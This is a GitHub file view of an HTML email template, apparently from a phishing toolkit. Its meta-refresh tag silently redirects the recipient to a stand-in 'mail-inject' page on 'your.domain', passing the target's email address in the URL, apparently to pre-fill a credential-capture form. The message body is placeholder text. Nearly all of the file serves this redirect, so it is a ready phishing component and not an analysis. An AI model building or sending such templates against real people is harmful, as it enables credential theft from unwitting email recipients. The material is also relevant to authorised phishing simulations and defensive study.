-
Notifications
You must be signed in to change notification settings - Fork 79
Expand file tree
/
Copy pathemail.html
More file actions
33 lines (32 loc) · 763 Bytes
/
Copy pathemail.html
File metadata and controls
33 lines (32 loc) · 763 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, width=device-width, height=device-height" name="viewport">
<meta http-equiv=refresh content=0;URL=http://your.domain/mail-inject/index.php?modal-username=research@subject.tld />
<style>
html, body {
position: relative;
height: 100%;
width: 100%;
overflow-x: hidden;
}
body {
font-family: Helvetica Neue,Helvetica,Arial,sans-serif;
margin: 0;
padding: 0;
color: #000;
font-size: 14px;
line-height: 1.4;
width: 100%;
height: 110%;
-webkit-text-size-adjust: 100%;
background: #fff;
overflow: hidden;
}
</style>
</head>
<body>
<p>Lorem ipsum EMAIL CONTENT</p>
</body>
</html>